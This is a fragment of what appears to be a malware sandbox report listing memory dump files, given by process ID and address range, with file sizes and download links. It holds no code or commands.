memory/4120-132-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/4120-131-0x0000000002FC0000-0x00000000036B6000-memory.dmp

Filesize
7.0MB

Download
memory/4164-139-0x0000000000000000-mapping.dmp

Download
memory/4436-135-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/4436-134-0x000000000297C000-0x0000000002D23000-memory.dmp

Filesize
3.7MB

Download
memory/4436-133-0x0000000000000000-mapping.dmp

Download
memory/4568-137-0x0000000000000000-mapping.dmp

Download
memory/4680-138-0x0000000000000000-mapping.dmp

Download
memory/5072-146-0x0000000000000000-mapping.dmp

Download